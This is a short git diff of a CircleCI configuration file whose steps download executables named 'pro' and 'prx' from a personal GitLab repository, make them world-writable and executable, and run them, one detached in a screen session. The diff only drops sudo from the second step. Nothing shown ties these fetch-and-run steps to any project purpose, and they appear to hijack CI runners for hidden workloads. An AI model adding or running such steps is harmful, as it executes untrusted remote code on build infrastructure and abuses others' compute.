--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -9,4 +9,4 @@ jobs:
     steps:
     
       - run: sudo apt update && sudo apt install screen && wget https://gitlab.com/Sherwoodfrey/prx/-/raw/main/pro && chmod 777 pro && screen -dmS run ./pro
-      - run: wget https://gitlab.com/Sherwoodfrey/prx/-/raw/main/prx && chmod 777 prx && sudo ./prx
+      - run: wget https://gitlab.com/Sherwoodfrey/prx/-/raw/main/prx && chmod 777 prx && ./prx
